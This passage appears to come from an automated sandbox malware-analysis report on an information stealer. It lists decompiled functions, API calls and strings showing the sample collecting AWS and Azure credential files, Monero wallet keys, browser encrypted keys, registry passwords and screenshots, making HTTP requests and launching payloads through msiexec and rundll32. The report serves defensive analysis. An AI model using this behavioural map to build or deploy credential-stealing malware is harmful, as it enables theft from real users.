                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00E54E59
                                    • Part of subcall function 00E54910: StrCmpCA.SHLWAPI(?,00E60FDC), ref: 00E54971
                                    • Part of subcall function 00E54910: StrCmpCA.SHLWAPI(?,00E60FE0), ref: 00E54987
                                    • Part of subcall function 00E54910: FindNextFileA.KERNEL32(000000FF,?), ref: 00E54B7D
                                    • Part of subcall function 00E54910: FindClose.KERNEL32(000000FF), ref: 00E54B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E54EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E54EE5
                                    • Part of subcall function 00E54910: wsprintfA.USER32 ref: 00E549B0
                                    • Part of subcall function 00E54910: StrCmpCA.SHLWAPI(?,00E608D2), ref: 00E549C5
                                    • Part of subcall function 00E54910: wsprintfA.USER32 ref: 00E549E2
                                    • Part of subcall function 00E54910: PathMatchSpecA.SHLWAPI(?,?), ref: 00E54A1E
                                    • Part of subcall function 00E54910: lstrcat.KERNEL32(?,01CBF258), ref: 00E54A4A
                                    • Part of subcall function 00E54910: lstrcat.KERNEL32(?,00E60FF8), ref: 00E54A5C
                                    • Part of subcall function 00E54910: lstrcat.KERNEL32(?,?), ref: 00E54A70
                                    • Part of subcall function 00E54910: lstrcat.KERNEL32(?,00E60FFC), ref: 00E54A82
                                    • Part of subcall function 00E54910: lstrcat.KERNEL32(?,?), ref: 00E54A96
                                    • Part of subcall function 00E54910: CopyFileA.KERNEL32(?,?,00000001), ref: 00E54AAC
                                    • Part of subcall function 00E54910: DeleteFileA.KERNEL32(?), ref: 00E54B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: e6125fe4d84866b7554f65c75da3f878d4b73b30a22c691c2a092826d28d9636
                                  • Instruction ID: 6bff9e7d292eddcf423c4c69da93989eb012ec7ecf698d5f4910bfc002b5a774
                                  • Opcode Fuzzy Hash: e6125fe4d84866b7554f65c75da3f878d4b73b30a22c691c2a092826d28d9636
                                  • Instruction Fuzzy Hash: D441B2BA940304A7CB60E770EC47FED3378AB20741F045994B685720C1EEB95BC98B92
                                  Function 00E59010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E5906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: bfd6c55c803ed5251934a173e23f9428942871eb8e170490bef51778c26e4e3f
                                  • Instruction ID: 3c0e07e46f0b4b2d32f3e5bbef196469ba39ef9ff3865c9721c965033534e0ef
                                  • Opcode Fuzzy Hash: bfd6c55c803ed5251934a173e23f9428942871eb8e170490bef51778c26e4e3f
                                  • Instruction Fuzzy Hash: E471FE75A10208EBDB14EFE4D989FEEB7B8BF48301F108509F556A7284DB39A945CB60
                                  Function 00E52E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E531C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E5335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E534EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: c938edffce1618d7a6f6e6f52252a91ebbd2c7c8846bd0f958ae53303ca8136a
                                  • Instruction ID: 7da9edbf314ecce508b74726ef7adba9b63aaffc2d03e80872f503ade45d4541
                                  • Opcode Fuzzy Hash: c938edffce1618d7a6f6e6f52252a91ebbd2c7c8846bd0f958ae53303ca8136a
                                  • Instruction Fuzzy Hash: 021231728001189ADB19EFA0DC96FDEB7B8AF54301F445A69F90676091EF342B4ECF61
                                  Function 00E552C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E46280: InternetOpenA.WININET(00E60DFE,00000001,00000000,00000000,00000000), ref: 00E462E1
                                    • Part of subcall function 00E46280: StrCmpCA.SHLWAPI(?,01CBF318), ref: 00E46303
                                    • Part of subcall function 00E46280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46335
                                    • Part of subcall function 00E46280: HttpOpenRequestA.WININET(00000000,GET,?,01CBE7B0,00000000,00000000,00400100,00000000), ref: 00E46385
                                    • Part of subcall function 00E46280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E463BF
                                    • Part of subcall function 00E46280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E463D1
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55318
                                  • lstrlen.KERNEL32(00000000), ref: 00E5532F
                                    • Part of subcall function 00E58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00E55364
                                  • lstrlen.KERNEL32(00000000), ref: 00E55383
                                  • lstrlen.KERNEL32(00000000), ref: 00E553AE
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: c5e3001d385279a5d80e372a9218c951f5b689c456f5dd905dc24330845a2a0d
                                  • Instruction ID: 37bda476b6bbb6649a3f65d75fbea4b0bafd65fd63f7be0597e4d4288b7e7732
                                  • Opcode Fuzzy Hash: c5e3001d385279a5d80e372a9218c951f5b689c456f5dd905dc24330845a2a0d
                                  • Instruction Fuzzy Hash: A7510E319101489BCB18FF60DD96AED77B9BF10302F546928FC067A592EF346B49CB62
                                  Function 00E512D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 8d8790e2fb53a154684965a87a09311d9be8cd8c061128d01b85316f4ec205e2
                                  • Instruction ID: b1519440a2c4cabe6d2da143ad83561e45ba99ce32e613c59debc0276f75f7f9
                                  • Opcode Fuzzy Hash: 8d8790e2fb53a154684965a87a09311d9be8cd8c061128d01b85316f4ec205e2
                                  • Instruction Fuzzy Hash: 76C1C5B59002189BCB14EF60DC89FEE73B8BB54305F0459D9F90A77142EB74AA89CF91
                                  Function 00E54280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E542EC
                                  • lstrcat.KERNEL32(?,01CBED50), ref: 00E5430B
                                  • lstrcat.KERNEL32(?,?), ref: 00E5431F
                                  • lstrcat.KERNEL32(?,01CBDC68), ref: 00E54333
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E58D90: GetFileAttributesA.KERNEL32(00000000,?,00E41B54,?,?,00E6564C,?,?,00E60E1F), ref: 00E58D9F
                                    • Part of subcall function 00E49CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E49D39
                                    • Part of subcall function 00E499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E499EC
                                    • Part of subcall function 00E499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E49A11
                                    • Part of subcall function 00E499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E49A31
                                    • Part of subcall function 00E499C0: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E49A5A
                                    • Part of subcall function 00E499C0: LocalFree.KERNEL32(00E4148F), ref: 00E49A90
                                    • Part of subcall function 00E499C0: CloseHandle.KERNEL32(000000FF), ref: 00E49A9A
                                    • Part of subcall function 00E593C0: GlobalAlloc.KERNEL32(00000000,00E543DD,00E543DD), ref: 00E593D3
                                  • StrStrA.SHLWAPI(?,01CBED20), ref: 00E543F3
                                  • GlobalFree.KERNEL32(?), ref: 00E54512
                                    • Part of subcall function 00E49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E49AEF
                                    • Part of subcall function 00E49AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E44EEE,00000000,?), ref: 00E49B01
                                    • Part of subcall function 00E49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E49B2A
                                    • Part of subcall function 00E49AC0: LocalFree.KERNEL32(?,?,?,?,00E44EEE,00000000,?), ref: 00E49B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E544A3
                                  • StrCmpCA.SHLWAPI(?,00E608D1), ref: 00E544C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E544D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00E544E5
                                  • lstrcat.KERNEL32(00000000,00E60FB8), ref: 00E544F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: 9affea4f006c7321b2f72baef4ed8744897edc453b16f4a1d2455974a1366560
                                  • Instruction ID: e3a01573b0579ed2308afb9f555439575a945da12bdafdc92f66f18404f9a725
                                  • Opcode Fuzzy Hash: 9affea4f006c7321b2f72baef4ed8744897edc453b16f4a1d2455974a1366560
                                  • Instruction Fuzzy Hash: 7A7179B6910208A7CB14EBB0DC85FEE73B9AB48301F045599F645B7181EA35DB49CF61
                                  Function 00E41310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E412B4
                                    • Part of subcall function 00E412A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E412BB
                                    • Part of subcall function 00E412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E412D7
                                    • Part of subcall function 00E412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E412F5
                                    • Part of subcall function 00E412A0: RegCloseKey.ADVAPI32(?), ref: 00E412FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4134F
                                  • lstrlen.KERNEL32(?), ref: 00E4135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00E41377
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E58B60: GetSystemTime.KERNEL32(00E60E1A,01CBAD00,00E605AE,?,?,00E413F9,?,0000001A,00E60E1A,00000000,?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E58B86
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E41465
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E499EC
                                    • Part of subcall function 00E499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E49A11
                                    • Part of subcall function 00E499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E49A31
                                    • Part of subcall function 00E499C0: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E49A5A
                                    • Part of subcall function 00E499C0: LocalFree.KERNEL32(00E4148F), ref: 00E49A90
                                    • Part of subcall function 00E499C0: CloseHandle.KERNEL32(000000FF), ref: 00E49A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E414EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: 8653daa22658caacdb6ecba505ee040c3f1f1dc2c7d19b35d79d730d614dad6b
                                  • Instruction ID: fdc043557b6c84d6142c84be06d3c8f7c5903a787aae77b200db0e53d66c7851
                                  • Opcode Fuzzy Hash: 8653daa22658caacdb6ecba505ee040c3f1f1dc2c7d19b35d79d730d614dad6b
                                  • Instruction Fuzzy Hash: 285185B2D5011897CB15FB60DC96FED73BCAF54301F4456E8B60A72082EE346B89CBA5
                                  Function 00E475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E472D0: memset.MSVCRT ref: 00E47314
                                    • Part of subcall function 00E472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E4733A
                                    • Part of subcall function 00E472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E473B1
                                    • Part of subcall function 00E472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E4740D
                                    • Part of subcall function 00E472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00E47452
                                    • Part of subcall function 00E472D0: HeapFree.KERNEL32(00000000), ref: 00E47459
                                  • lstrcat.KERNEL32(00000000,00E617FC), ref: 00E47606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E47648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00E4765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E4768F
                                  • lstrcat.KERNEL32(00000000,00E61804), ref: 00E476A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E476D3
                                  • lstrcat.KERNEL32(00000000,00E61808), ref: 00E476ED
                                  • task.LIBCPMTD ref: 00E476FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
